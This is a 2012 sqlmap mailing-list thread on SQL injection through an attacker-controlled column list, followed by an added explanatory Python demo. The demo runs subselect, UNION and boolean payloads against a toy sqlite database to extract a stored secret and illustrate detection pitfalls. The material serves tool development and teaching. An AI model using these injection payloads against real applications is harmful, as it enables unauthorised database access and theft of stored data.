Thread: [sqlmap-users] Injection into columns list
Brought to you by:
inquisb
From: Troy B <pow...@gm...> - 2012-07-24 21:17:38
Evening all,

I had an SQL injection into a MySQL5-based web application the other week which involved me having control over the column list being selected. I tried sqlmap against the URL, but it didn't find the injection point. I tried again, taking the --level and --risk a little higher, but still nothing.

In the end, I manually exploited it using a sub-select. Was I doing something wrong with sqlmap, or will it not identify injection points like that? I can provide an example of the query the application was using if this helps.

Regards,

Matt
From: Miroslav S. <mir...@gm...> - 2012-07-24 22:48:45
Hi Troy.

More info is required for sure.

You mean that you just need a (SELECT...)/subquery type of injection? This is something that we are aware that we need to do.

Kind regards,
Miroslav Stampar

On Jul 24, 2012 11:18 PM, "Troy B" <pow...@gm...> wrote:
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
From: Dennis <kor...@ya...> - 2012-07-25 09:28:37
I'm not sure about Troy, but I had a similar case recently. I could control the bit of the query between SELECT and FROM, which could be exploited either with nested (SELECT)s or by expanding the query with another FROM [...] UNION SELECT [...] to extend the query. SQLmap did not find the injection. The DBMS was Oracle.

Cheers

On 25.07.2012 00:48, Miroslav Stampar wrote:
> [quoted reply of 2012-07-24 22:48:45 omitted]
From: Miroslav S. <mir...@gm...> - 2012-07-25 09:47:55
Hi.

How would you exploit this:

SELECT $_GET['id'] FROM table

on all DBMSes?

Oracle and MySQL have DUAL, but what about the others? In the end we'll end up with 10 new payloads and/or boundaries, each of those covering one DBMS.

Kind regards,
Miroslav Stampar

On Wed, Jul 25, 2012 at 11:28 AM, Dennis <kor...@ya...> wrote:
> [quoted reply of 2012-07-25 09:28:37 omitted]

--
Miroslav Stampar
http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2012-07-25 10:10:04
Hi again.

The most generic approach would be to use a dummy prefix such as "99999 WHERE 1=1", but there are lots of potential pitfalls here (e.g. if the column name is delimited with a DBMS-specific column name delimiter). We've added a new issue for this [1].

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/120

On Wed, Jul 25, 2012 at 11:47 AM, Miroslav Stampar <mir...@gm...> wrote:
> [quoted reply of 2012-07-25 09:47:55 omitted]

--
Miroslav Stampar
http://about.me/stamparm
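To make the column-list injection shape discussed in the two messages above concrete, here is an added example; it is not code from this thread and not sqlmap's own code. It mimics `SELECT $_GET['id'] FROM table` with Python's sqlite3 against a constructed in-memory database and tries the three payload shapes the thread mentions: a nested (SELECT ...) of the kind Troy and Dennis used, a FROM ... UNION SELECT ... extension, and a boolean check behind a dummy prefix like "99999 WHERE 1=1". It also reproduces the delimited-identifier pitfall Miroslav raises by letting the "application" wrap the value in backticks. The table and column names, the payload strings and the helper names are assumptions for illustration. Note that the "99999 WHERE 1=1" form only works because SQLite, like MySQL, accepts a SELECT without FROM; Oracle would need FROM DUAL, which is exactly the portability problem the thread is about.

```python
import sqlite3


def build_db():
    """Constructed sample schema and data, not taken from the thread."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER, name TEXT);
        INSERT INTO users VALUES (1, 'alice'), (2, 'bob');
        CREATE TABLE secrets(token TEXT);
        INSERT INTO secrets VALUES ('s3cr3t');
    """)
    return con


def vulnerable_query(con, column_list, delimited=False):
    """Mimic `SELECT $_GET['id'] FROM table`: the attacker controls the
    column list. With delimited=True the app wraps the value in backticks
    (the MySQL-style identifier delimiter, which SQLite accepts too); that
    is the pitfall noted in the thread. Returns the first column of every
    row, or None on a database error, which is what a tester would see as
    an error page instead of data."""
    col = f"`{column_list}`" if delimited else column_list
    sql = f"SELECT {col} FROM users"
    try:
        return [row[0] for row in con.execute(sql)]
    except sqlite3.OperationalError:
        return None


# Assumed payloads. The trailing `--` comments out the app's own ` FROM users`.
PAYLOADS = {
    # Nested SELECT: the injected column expression is a scalar subquery,
    # so no FROM of our own is needed and the app's FROM stays intact.
    "subselect": "(SELECT token FROM secrets)",
    # Extend the query with a FROM ... UNION SELECT ... of our own.
    "union": "name FROM users UNION SELECT token FROM secrets --",
    # Dummy prefix plus a boolean condition. Relies on the DBMS allowing a
    # FROM-less SELECT; on Oracle this would need "FROM DUAL".
    "bool_true": "99999 WHERE 1=1 AND 1=1 --",
    "bool_false": "99999 WHERE 1=1 AND 1=2 --",
}


def detect_boolean_injection(con, delimited=False):
    """The check a scanner would make: send a true and a false condition
    behind the same dummy prefix and compare the responses. Returns True
    only if both queries ran without error and gave different results."""
    t = vulnerable_query(con, PAYLOADS["bool_true"], delimited)
    f = vulnerable_query(con, PAYLOADS["bool_false"], delimited)
    return t is not None and f is not None and t != f


if __name__ == "__main__":
    con = build_db()
    for name, payload in PAYLOADS.items():
        print(f"{name:10} -> {vulnerable_query(con, payload)}")
    print("boolean injection, plain column list:", detect_boolean_injection(con))
    print("boolean injection, delimited column:  ", detect_boolean_injection(con, delimited=True))
```

With the plain column list every payload succeeds and the true/false pair returns one row versus none, which is the difference a boolean-based detection keys on. With the backtick-delimited column every payload becomes an unknown identifier and the database errors out, so the same detection reports nothing; that is the pitfall behind the "dummy prefix" idea, and why a separate boundary (closing the delimiter first) would be needed per DBMS.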
From: Dennis <kor...@ya...> - 2012-07-25 12:17:29
Hey,

I haven't spent any time thinking about a generic approach yet, as I was on an Oracle DBMS and did fine. But I see your point... I will give it a thought...

Cheers,
Dennis

On 25.07.2012 12:09, Miroslav Stampar wrote:
> [quoted reply of 2012-07-25 10:10:04 omitted]